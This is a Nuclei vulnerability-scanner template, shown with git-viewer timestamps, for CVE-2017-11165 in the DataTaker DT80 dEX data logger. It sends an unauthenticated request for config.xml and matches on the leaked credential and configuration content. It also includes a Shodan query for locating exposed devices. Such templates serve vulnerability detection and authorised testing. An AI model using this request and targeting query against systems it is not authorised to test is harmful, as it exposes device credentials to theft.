nuclei-templates/cves/2017/CVE-2017-11165.yaml

41 lines
1.0 KiB
YAML
Raw Normal View History

2023-01-15 12:41:22 +00:00
id: CVE-2017-11165
info:
name: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure
author: theabhinavgaur
severity: critical
description: |
dataTaker DT80 dEX 1.50.012 allows remote attackers to obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI.
reference:
- https://www.exploit-db.com/exploits/45094
2023-01-15 20:02:03 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-11165
2023-01-15 12:41:22 +00:00
classification:
2023-01-15 20:02:03 +00:00
cve-id: CVE-2017-11165
metadata:
verified: true
shodan-query: http.title:"datataker"
tags: cve,cve2017,datataker,config,exposure,lfr
2023-01-15 12:41:22 +00:00
requests:
- method: GET
path:
2023-01-15 20:02:03 +00:00
- "{{BaseURL}}/services/getFile.cmd?userfile=config.xml"
2023-01-15 12:41:22 +00:00
matchers-condition: and
matchers:
- type: word
words:
2023-01-15 20:02:03 +00:00
- "COMMAND_SERVER"
- "<loggerSettings>"
- "config id=\"config"
2023-01-15 12:41:22 +00:00
condition: and
2023-01-15 20:02:03 +00:00
- type: word
part: header
words:
- "text/xml"
2023-01-15 12:41:22 +00:00
- type: status
status:
- 200